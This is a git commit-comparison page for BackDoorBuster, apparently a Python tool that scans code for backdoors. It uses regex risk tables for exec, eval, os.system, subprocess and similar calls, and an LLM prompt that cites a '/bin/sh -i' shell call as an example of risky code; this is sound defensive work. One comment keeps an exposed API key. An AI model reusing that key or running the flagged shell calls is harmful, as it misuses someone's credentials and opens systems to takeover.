Compare commits
105 Commits
dbdfc1897c
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
| c3ed3e166e | |||
| f6fa95ba16 | |||
| 94407e71b8 | |||
| 2adb1cbc2e | |||
| 430d2b8f8a | |||
| 752e774714 | |||
| 373defc5bb | |||
| c811e434c6 | |||
| 167bbe0a14 | |||
| e9b1e82492 | |||
| a2651b499e | |||
| a5f7665799 | |||
| caeee4d179 | |||
| 7198c8b4da | |||
| 843c9d7ba3 | |||
| cb30fddb1c | |||
| 81cbc88e9b | |||
| fc4e0e3b30 | |||
| ec30999d2c | |||
| 0f2fb3c925 | |||
| fd4ecce710 | |||
| 610e35f868 | |||
| 6e1c0e5ae6 | |||
| 977841837d | |||
| 42135c516c | |||
| 72901463c6 | |||
| 65820966df | |||
| b3435c00c3 | |||
| cd779ef43f | |||
| fbeba5b4fc | |||
| 3f6375977c | |||
| 5aafb1c24f | |||
| 5d41503b39 | |||
| 5a228e5cb0 | |||
| 4f5c67b32e | |||
| 4a55822a8f | |||
| 4e67f4ebed | |||
| 6f51f86d6a | |||
| f113449fc4 | |||
| 4f4860342c | |||
| 49408eda9f | |||
| e653ddd726 | |||
| ca69536e41 | |||
| d1ac4594e4 | |||
| 1a71a72ddf | |||
| da9b2b52ac | |||
| 62b77812af | |||
| 7eb4de8e6c | |||
| b99334ed12 | |||
| 17245a9bcf | |||
| b673575fe4 | |||
| df65fff2c7 | |||
| aeb4a33d98 | |||
| 89b37ddfd6 | |||
| f798cf143c | |||
| 95feda67d9 | |||
| 5ed90e39f8 | |||
| e80e83ad51 | |||
| 7cc81141c6 | |||
| 2a94f27edc | |||
| 0cd826c2fd | |||
| d56d0173ad | |||
| 0c4f560b7a | |||
| 41b16c53bc | |||
| 99b481059b | |||
| d2b0fb286c | |||
| 8a14ef4341 | |||
| e418bbf380 | |||
| d30ea0ca61 | |||
| 5552a7e448 | |||
| 99457f1ceb | |||
| 2b90268628 | |||
| dd4ab45cbf | |||
| 3f8b2a7987 | |||
| 40f5c07fa1 | |||
| b73170cd2d | |||
| b518fef6d2 | |||
| accd50e8ce | |||
| fab5e680ef | |||
| 6967a154f7 | |||
| c97780cde3 | |||
| b544007e6b | |||
| b1bc566c09 | |||
| f0e2251dc0 | |||
| faf68760c9 | |||
| 44c6086b8c | |||
| 27ec14be54 | |||
| 21d1a6f3cc | |||
| 8fed7af432 | |||
| 9a7c38f1a8 | |||
| dd45c467a3 | |||
| 79a605a6b4 | |||
| 9d6f054478 | |||
| 569497f79e | |||
| 958dee355e | |||
| 8d445b11a4 | |||
| ed3b9e7e4c | |||
| 97fbf649a8 | |||
| db3244f55a | |||
| d073cfad31 | |||
| 0ae787002c | |||
| fa86f12a48 | |||
| 2e5460a522 | |||
| 3e0dd66d31 | |||
| 24206b13af |
1
.gitattributes
vendored
Normal file
1
.gitattributes
vendored
Normal file
@@ -0,0 +1 @@
|
||||
*.webp filter=lfs diff=lfs merge=lfs -text
|
||||
2
.gitignore
vendored
2
.gitignore
vendored
@@ -159,4 +159,4 @@ cython_debug/
|
||||
# and can be added to the global gitignore or merged into this file. For a more nuclear
|
||||
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
|
||||
.idea/
|
||||
|
||||
tmp/
|
||||
|
||||
2
MANIFEST.in
Normal file
2
MANIFEST.in
Normal file
@@ -0,0 +1,2 @@
|
||||
include README.md
|
||||
include LICENSE
|
||||
65
README.md
65
README.md
@@ -1,5 +1,7 @@
|
||||
# BackDoorBuster
|
||||
|
||||

|
||||
|
||||
## 项目背景
|
||||
|
||||
随着网络安全威胁的增加,恶意软件和后门的检测成为了保护个人和组织数据安全的重要任务。后门通常被隐藏在合法软件中,给黑客提供远程控制目标系统的能力。本项目旨在开发一个工具,能够有效识别和评估潜在的后门风险。
|
||||
@@ -16,21 +18,66 @@
|
||||
- **报告生成**: 自动生成详细的检测报告,列出所有发现的敏感操作和对应的风险等级。
|
||||
- **持续更新与维护**: 随着新的后门技术和检测方法的出现,持续更新正则表达式库和评级标准。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 使用说明
|
||||
|
||||
1. 安装依赖:
|
||||
|
||||
```bash
|
||||
pip install -r requirements.txt
|
||||
```
|
||||
|
||||
2. 执行扫描:
|
||||
1. 执行扫描:
|
||||
|
||||
```bash
|
||||
python scan.py <project_directory>
|
||||
python -m detection <project_directory> -o <path> -m <mode>
|
||||
```
|
||||
|
||||
3. 查看报告:
|
||||
2. 查看报告:
|
||||
|
||||
报告将以文本形式输出在控制台,并可选择输出到指定文件。
|
||||
|
||||
|
||||
BIN
banner.webp
(Stored with Git LFS)
Normal file
BIN
banner.webp
(Stored with Git LFS)
Normal file
Binary file not shown.
@@ -1,8 +1,11 @@
|
||||
import json
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
from .utils import *
|
||||
import openai
|
||||
import signal
|
||||
# import signal
|
||||
|
||||
|
||||
class TimeoutException(Exception):
|
||||
@@ -22,10 +25,10 @@ def detectGPT(content: str):
|
||||
raise ValueError("env OPENAI_API_KEY no set")
|
||||
|
||||
# Set alarm timer
|
||||
signal.signal(signal.SIGTERM, timeout_handler)
|
||||
signal.alarm(10)
|
||||
# signal.signal(signal.SIGTERM, timeout_handler)
|
||||
# signal.alarm(10)
|
||||
|
||||
client = openai.OpenAI(api_key=api_key)
|
||||
client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key)
|
||||
text = content
|
||||
# client = openai.OpenAI(api_key="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") #测试用key
|
||||
response = client.chat.completions.create(
|
||||
@@ -33,15 +36,17 @@ def detectGPT(content: str):
|
||||
{
|
||||
"role": "system",
|
||||
"content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: "
|
||||
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
|
||||
"You are required to only output the json format. Do not output any other information.\n",
|
||||
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
|
||||
"You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n"
|
||||
"For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n"
|
||||
"Please IGNORE the risks that dont matter a lot.",
|
||||
},
|
||||
{
|
||||
"role": "user",
|
||||
"content": text,
|
||||
},
|
||||
],
|
||||
model="gpt-3.5-turbo",
|
||||
model="gpt-4o",
|
||||
)
|
||||
try:
|
||||
message_content = response.choices[0].message.content
|
||||
@@ -55,12 +60,46 @@ def detectGPT(content: str):
|
||||
except TimeoutException:
|
||||
raise TimeoutException("The api call timed out")
|
||||
|
||||
finally:
|
||||
signal.alarm(0)
|
||||
# finally:
|
||||
# signal.alarm(0)
|
||||
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
for res in res_json:
|
||||
classified_results[res["Risk"]].append(
|
||||
(res["Line"], text.split("\n")[res["Line"] - 1].strip())
|
||||
)
|
||||
try:
|
||||
classified_results[res["Risk"]].append(
|
||||
(res["Line"], text.split("\n")[res["Line"] - 1].strip())
|
||||
)
|
||||
except IndexError:
|
||||
pass
|
||||
return classified_results
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
# print(len(fileList))
|
||||
results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
threads = []
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.1)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results):
|
||||
try:
|
||||
res = detectGPT(content)
|
||||
# print(res)
|
||||
for key in res:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{filename}: Line {line_num}", line)
|
||||
for line_num, line in res[key]
|
||||
]
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
|
||||
@@ -12,7 +12,7 @@ def find_dangerous_functions(
|
||||
r"\bexec\(": "high",
|
||||
r"\bpopen\(": "medium",
|
||||
r"\beval\(": "high",
|
||||
r"\bsubprocess\.run\(": "medium",
|
||||
r"\bsubprocess": "medium",
|
||||
r"\b__getattribute__\(": "high",
|
||||
r"\bgetattr\(": "medium",
|
||||
r"\b__import__\(": "high",
|
||||
@@ -25,15 +25,28 @@ def find_dangerous_functions(
|
||||
".cpp": {
|
||||
r"\bsystem\(": "high",
|
||||
},
|
||||
".pyc": {
|
||||
r"\bexec\b": "high",
|
||||
r"\beval\b": "high",
|
||||
r"\bos\.system\b": "high",
|
||||
r"\bos\.exec\b": "high",
|
||||
r"\bos\.fork\b": "high",
|
||||
r"\bos\.kill\b": "high",
|
||||
r"\bos\.popen\b": "medium",
|
||||
r"\bos\.spawn\b": "medium",
|
||||
r"\bsubprocess": "medium",
|
||||
},
|
||||
}
|
||||
risk_patterns = patterns.get(file_extension, {})
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
for line_number, line in enumerate(file_content.split("\n"), start=1):
|
||||
clean_line = remove_comments(line, file_extension)
|
||||
if not clean_line:
|
||||
continue
|
||||
for pattern, risk_level in risk_patterns.items():
|
||||
if re.search(pattern, clean_line):
|
||||
classified_results[risk_level].append((line_number, clean_line))
|
||||
if file_content is not None:
|
||||
for line_number, line in enumerate(file_content.split("\n"), start=1):
|
||||
clean_line = remove_comments(line, file_extension)
|
||||
if not clean_line:
|
||||
continue
|
||||
# 消除换行符,避免影响正则匹配
|
||||
clean_line = clean_line.replace("\\n", "")
|
||||
for pattern, risk_level in risk_patterns.items():
|
||||
if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL):
|
||||
classified_results[risk_level].append((line_number, clean_line))
|
||||
return classified_results
|
||||
|
||||
|
||||
502
detection/__main__.py
Normal file
502
detection/__main__.py
Normal file
@@ -0,0 +1,502 @@
|
||||
import json
|
||||
import os
|
||||
from typing import Dict, List, Tuple, Optional
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
|
||||
from .requirements_detection import requirement_detection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT, GPTdetectFileList
|
||||
|
||||
# from .cngptdetection import detectGPT,GPTdetectFileList
|
||||
from .pyc_detection import disassemble_pyc
|
||||
from .utils import *
|
||||
import sys
|
||||
from colorama import init, Fore, Style
|
||||
from tqdm import tqdm
|
||||
from pathlib import Path
|
||||
|
||||
PYCDC_FLAG = True
|
||||
PYCDC_ADDR_FLAG = True
|
||||
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"}
|
||||
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
|
||||
ORDERS = [
|
||||
"__import__",
|
||||
"system",
|
||||
"exec",
|
||||
"popen",
|
||||
"eval",
|
||||
"subprocess",
|
||||
"__getattribute__",
|
||||
"getattr",
|
||||
"child_process",
|
||||
"kill",
|
||||
"fork",
|
||||
]
|
||||
|
||||
# Initialize colorama
|
||||
init(autoreset=True)
|
||||
|
||||
ORANGE = "\033[38;5;214m"
|
||||
CYAN = Fore.CYAN
|
||||
|
||||
|
||||
def supports_color() -> bool:
|
||||
"""
|
||||
Checks if the running terminal supports color output.
|
||||
|
||||
Returns:
|
||||
bool: True if the terminal supports color, False otherwise.
|
||||
"""
|
||||
# Windows support
|
||||
if sys.platform == "win32":
|
||||
return True
|
||||
# Check if output is a TTY (terminal)
|
||||
if hasattr(sys.stdout, "isatty") and sys.stdout.isatty():
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
def supports_emoji() -> bool:
|
||||
"""
|
||||
Checks if the running terminal supports emoji output.
|
||||
|
||||
Returns:
|
||||
bool: True if the terminal supports emoji, False otherwise.
|
||||
"""
|
||||
# This is a simple check. Modern terminals typically support emoji.
|
||||
return sys.platform != "win32" or os.getenv("WT_SESSION") is not None
|
||||
|
||||
|
||||
def highlight_orders(line: str, risk_level: str, use_color: bool) -> str:
|
||||
"""
|
||||
Highlights specific orders in the line based on risk level.
|
||||
|
||||
Args:
|
||||
line (str): The line to highlight.
|
||||
risk_level (str): The risk level of the line ("high", "medium", "low").
|
||||
use_color (bool): Whether to use color for highlighting.
|
||||
|
||||
Returns:
|
||||
str: The highlighted line.
|
||||
"""
|
||||
risk_colors = {
|
||||
"high": Fore.RED,
|
||||
"medium": Fore.YELLOW,
|
||||
"low": CYAN,
|
||||
}
|
||||
color = risk_colors.get(risk_level, Fore.WHITE) if use_color else ""
|
||||
reset = Style.RESET_ALL if use_color else ""
|
||||
|
||||
for order in ORDERS:
|
||||
line = line.replace(order, f"{color}{order}{reset}")
|
||||
return line
|
||||
|
||||
|
||||
def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str:
|
||||
"""
|
||||
Generates a formatted text report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
|
||||
Returns:
|
||||
str: The formatted text report as a string.
|
||||
"""
|
||||
use_color = supports_color()
|
||||
use_emoji = supports_emoji()
|
||||
|
||||
text_output = "Security Analysis Report\n"
|
||||
text_output += "=" * 30 + "\n\n"
|
||||
# text_output+= "chatGPT检测结果:\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
# print(risk_level, entries)
|
||||
if risk_level == "pickles":
|
||||
text_output += f"Pickles:\n"
|
||||
for i in entries:
|
||||
text_output += f" {i['file']}:{json.dumps(i['result'])}\n"
|
||||
elif entries and risk_level != "none":
|
||||
risk_color = (
|
||||
{
|
||||
"high": Fore.RED,
|
||||
"medium": Fore.YELLOW,
|
||||
"low": Fore.GREEN,
|
||||
}.get(risk_level, Fore.WHITE)
|
||||
if use_color
|
||||
else ""
|
||||
)
|
||||
|
||||
risk_title = (
|
||||
{
|
||||
"High": "👹",
|
||||
"Medium": "👾",
|
||||
"Low": "👻",
|
||||
}
|
||||
if use_emoji
|
||||
else {
|
||||
"High": "",
|
||||
"Medium": "",
|
||||
"Low": "",
|
||||
}
|
||||
)
|
||||
|
||||
text_output += f"{risk_color}{risk_level.capitalize()} Risk{risk_title[risk_level.capitalize()]}:{Style.RESET_ALL if use_color else ''}\n"
|
||||
text_output += "-" * (len(risk_level) + 6) + "\n"
|
||||
for line_num, line in entries:
|
||||
line = highlight_orders(line, risk_level, use_color)
|
||||
line_text = f"{Style.RESET_ALL if use_color else ''} {Fore.GREEN if use_color else ''}{line_num}{Style.RESET_ALL if use_color else ''}: {line}{Style.RESET_ALL if use_color else ''}\n"
|
||||
text_output += line_text
|
||||
text_output += "\n"
|
||||
|
||||
return text_output
|
||||
|
||||
|
||||
def output_results(
|
||||
results: Dict[str, List[Tuple[int, str]]],
|
||||
output_format: str,
|
||||
output_file: Optional[str] = None,
|
||||
) -> None:
|
||||
"""
|
||||
Outputs the security analysis results in the specified format.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
output_format (str): The format to output the results in. Supported formats: "pdf", "html", "md", "txt".
|
||||
output_file (Optional[str]): The name of the file to save the output. If None, prints to the terminal.
|
||||
"""
|
||||
OUTPUT_FORMATS = {"pdf", "html", "md", "txt"}
|
||||
|
||||
if output_file:
|
||||
file_name, file_ext = os.path.splitext(output_file)
|
||||
if output_format not in OUTPUT_FORMATS:
|
||||
output_format = "txt"
|
||||
output_file = f"{file_name}.txt"
|
||||
results_dir = os.path.dirname(output_file)
|
||||
if not os.path.exists(results_dir) and results_dir != "":
|
||||
os.makedirs(results_dir)
|
||||
if output_format == "pdf":
|
||||
output_pdf(results, output_file)
|
||||
elif output_format == "html":
|
||||
output_html(results, output_file)
|
||||
elif output_format == "md":
|
||||
output_markdown(results, output_file)
|
||||
else: # Default to txt
|
||||
output_text(results, output_file)
|
||||
else:
|
||||
# If no output file is specified, default to text output to the terminal.
|
||||
txt_output = generate_text_content(results)
|
||||
print(txt_output)
|
||||
|
||||
|
||||
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
|
||||
doc = SimpleDocTemplate(file_name, pagesize=letter)
|
||||
story = []
|
||||
styles = getSampleStyleSheet()
|
||||
|
||||
# Add the title centered
|
||||
title_style = styles["Title"]
|
||||
title_style.alignment = 1 # Center alignment
|
||||
title = Paragraph("Security Analysis Report", title_style)
|
||||
story.append(title)
|
||||
story.append(Spacer(1, 20)) # Space after title
|
||||
|
||||
# Add risk levels and entries
|
||||
normal_style = styles["BodyText"]
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
story.append(
|
||||
Paragraph(f"{risk_level.capitalize()} Risk:", styles["Heading2"])
|
||||
)
|
||||
for line_num, line in entries:
|
||||
entry = Paragraph(f"Line {line_num}: {line}", normal_style)
|
||||
story.append(entry)
|
||||
story.append(Spacer(1, 12)) # Space between sections
|
||||
|
||||
doc.build(story)
|
||||
|
||||
|
||||
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates an HTML report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the HTML output. If None, returns the HTML string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The HTML string if file_name is None, otherwise None.
|
||||
"""
|
||||
html_output = """
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
|
||||
<title>Security Analysis Report</title>
|
||||
<style>
|
||||
body {
|
||||
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
|
||||
background-size: 100%, auto;
|
||||
background-attachment: fixed;
|
||||
font-family: Arial, sans-serif;
|
||||
}
|
||||
h1, h2 {
|
||||
color: white;
|
||||
}
|
||||
ul {
|
||||
list-style-type: none;
|
||||
padding: 0;
|
||||
}
|
||||
li {
|
||||
background: rgba(255, 255, 255, 0.8);
|
||||
margin: 5px 0;
|
||||
padding: 10px;
|
||||
border-radius: 5px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Security Analysis Report</h1>
|
||||
"""
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
risk_title = {
|
||||
"High": f"<h2>{risk_level.capitalize()} Risk👹</h2><ul>",
|
||||
"Medium": f"<h2>{risk_level.capitalize()} Risk👾</h2><ul>",
|
||||
"Low": f"<h2>{risk_level.capitalize()} Risk👻</h2><ul>",
|
||||
}
|
||||
html_output += risk_title[risk_level.capitalize()]
|
||||
for line_num, line in entries:
|
||||
html_output += f"<li>{line_num}: {line}</li>"
|
||||
html_output += "</ul>"
|
||||
|
||||
html_output += "</body></html>"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w", encoding="utf-8") as file:
|
||||
file.write(html_output)
|
||||
return None
|
||||
else:
|
||||
return html_output
|
||||
|
||||
|
||||
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates a Markdown report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the Markdown output. If None, returns the Markdown string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The Markdown string if file_name is None, otherwise None.
|
||||
"""
|
||||
md_output = "# Security Analysis Report\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
md_output += f"## {risk_level.capitalize()} Risk\n\n"
|
||||
md_output += "| Line Number | Description |\n"
|
||||
md_output += "|-------------|-------------|\n"
|
||||
for line_num, line in entries:
|
||||
md_output += f"| {line_num} | {line} |\n"
|
||||
md_output += "\n"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(md_output)
|
||||
return None
|
||||
else:
|
||||
return md_output
|
||||
|
||||
|
||||
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates a plain text report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the text output. If None, returns the text string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The text string if file_name is None, otherwise None.
|
||||
"""
|
||||
text_output = "Security Analysis Report\n"
|
||||
text_output += "=" * len("Security Analysis Report") + "\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
text_output += f"{risk_level.capitalize()} Risk:\n"
|
||||
text_output += "-" * len(f"{risk_level.capitalize()} Risk:") + "\n"
|
||||
for line_num, line in entries:
|
||||
text_output += f" Line {line_num}: {line}\n"
|
||||
text_output += "\n"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(text_output)
|
||||
return None
|
||||
else:
|
||||
return text_output
|
||||
|
||||
|
||||
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: str):
|
||||
# TODO:添加更多方式,这里提高代码的复用性和扩展性
|
||||
if fileExtension == ".pyc":
|
||||
# 反汇编pyc文件
|
||||
file_content = disassemble_pyc(filePath, pycdc_addr)
|
||||
if file_content == "none":
|
||||
global PYCDC_FLAG
|
||||
PYCDC_FLAG = False
|
||||
return ""
|
||||
elif file_content == "invalid":
|
||||
global PYCDC_ADDR_FLAG
|
||||
PYCDC_ADDR_FLAG = False
|
||||
if mode == "regex":
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
elif mode == "llm":
|
||||
return detectGPT(file_content)
|
||||
else:
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
else:
|
||||
file_content = read_file_content(filePath)
|
||||
if mode == "regex":
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
elif mode == "llm":
|
||||
return detectGPT(file_content)
|
||||
else:
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
|
||||
|
||||
def process_path(
|
||||
path: str,
|
||||
output_format: str,
|
||||
mode: str,
|
||||
pycdc_addr: str,
|
||||
output_file=None,
|
||||
requirement_path=None,
|
||||
):
|
||||
results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []}
|
||||
if os.path.isdir(path):
|
||||
# 使用rglob获取所有文件
|
||||
all_files = [
|
||||
file_path
|
||||
for file_path in Path(path).rglob("*")
|
||||
if file_path.suffix in SUPPORTED_EXTENSIONS
|
||||
]
|
||||
print(all_files)
|
||||
if mode == "llm":
|
||||
results = GPTdetectFileList(all_files)
|
||||
else:
|
||||
# 扫描动画
|
||||
for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
|
||||
file_extension = file_path.suffix
|
||||
# print(file_extension)
|
||||
if file_extension in [".pkl",".pickle"]:
|
||||
# print("识别到pickle")
|
||||
res = pickleDataDetection(str(file_path), output_file)
|
||||
results["pickles"].append({"file": str(file_path), "result": res})
|
||||
continue
|
||||
file_results = checkModeAndDetect(
|
||||
mode, str(file_path), file_extension, pycdc_addr
|
||||
)
|
||||
if file_results is not None:
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{file_path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
elif os.path.isfile(path):
|
||||
file_extension = os.path.splitext(path)[1]
|
||||
if file_extension in [".pkl", ".pickle"]:
|
||||
res = pickleDataDetection(str(path), output_file)
|
||||
results["pickles"].append({"file": str(path), "result": res})
|
||||
elif file_extension in SUPPORTED_EXTENSIONS:
|
||||
file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr)
|
||||
if file_results is not None:
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
else:
|
||||
print("Unsupported file type.")
|
||||
return
|
||||
else:
|
||||
print("Invalid path.")
|
||||
sys.exit(1)
|
||||
if requirement_path is not None:
|
||||
requirement_detection(requirement_path, output_file)
|
||||
output_results(results, output_format, output_file)
|
||||
|
||||
|
||||
def main():
|
||||
import argparse
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Backdoor detection tool.", prog="detection"
|
||||
)
|
||||
parser.add_argument("path", help="Path to the code to analyze")
|
||||
parser.add_argument("-o", "--output", help="Output file path", default=None)
|
||||
parser.add_argument(
|
||||
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
|
||||
)
|
||||
parser.add_argument(
|
||||
"-p",
|
||||
"--pycdc",
|
||||
help="Path to pycdc.exe to decompile",
|
||||
default=os.getenv("PATH"),
|
||||
)
|
||||
parser.add_argument(
|
||||
"-P",
|
||||
"--Pickle",
|
||||
help="Path to pickle file to analyze",
|
||||
default=None,
|
||||
)
|
||||
parser.add_argument(
|
||||
"-r",
|
||||
"--requirement",
|
||||
help="Path to requirement file to analyze",
|
||||
default=None,
|
||||
)
|
||||
args = parser.parse_args()
|
||||
output_format = "txt" # Default output format
|
||||
output_file = None
|
||||
if args.output:
|
||||
_, ext = os.path.splitext(args.output)
|
||||
ext = ext.lower()
|
||||
if ext in [".html", ".md", ".txt", ".pdf"]:
|
||||
output_format = ext.replace(".", "")
|
||||
output_file = args.output
|
||||
else:
|
||||
print(
|
||||
"Your input file format was incorrect, the output has been saved as a TXT file."
|
||||
)
|
||||
output_file = args.output.rsplit(".", 1)[0] + ".txt"
|
||||
# 如果未指定输出文件,则输出到 stdout;否则写入文件
|
||||
process_path(
|
||||
args.path, output_format, args.mode, args.pycdc, output_file, args.requirement
|
||||
)
|
||||
if PYCDC_FLAG == False:
|
||||
print(
|
||||
"ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc."
|
||||
)
|
||||
print("Repo: https://github.com/zrax/pycdc.git")
|
||||
if PYCDC_ADDR_FLAG == False:
|
||||
print("ERROR: The specified pycdc.exe path is not valid")
|
||||
print("Please check your pycdc path.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -3,6 +3,8 @@ from typing import Dict, List, Tuple
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT
|
||||
from .utils import *
|
||||
@@ -176,6 +178,7 @@ def main():
|
||||
parser.add_argument(
|
||||
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
|
||||
)
|
||||
parser.add_argument("-p", "--pickle", help="analyze the pickle file", default=None)
|
||||
args = parser.parse_args()
|
||||
output_format = "txt" # Default output format
|
||||
output_file = None
|
||||
@@ -191,7 +194,10 @@ def main():
|
||||
)
|
||||
output_file = args.output.rsplit(".", 1)[0] + ".txt"
|
||||
# 如果未指定输出文件,则输出到 stdout;否则写入文件
|
||||
process_path(args.path, output_format, args.mode, output_file)
|
||||
if args.pickle:
|
||||
pickleDataDetection(args.pickle, output_file)
|
||||
else:
|
||||
process_path(args.path, output_format, args.mode, output_file)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
149
detection/cngptdetection.py
Normal file
149
detection/cngptdetection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
import requests
|
||||
import re
|
||||
import json
|
||||
from typing import List, Dict, Any
|
||||
|
||||
from detection.utils import read_file_content
|
||||
|
||||
|
||||
class TimeoutException(Exception):
|
||||
"""自定义异常用于处理超时情况。"""
|
||||
pass
|
||||
|
||||
|
||||
def detectGPT(content: str,token:str):
|
||||
"""
|
||||
检测给定的代码内容中的潜在安全漏洞。
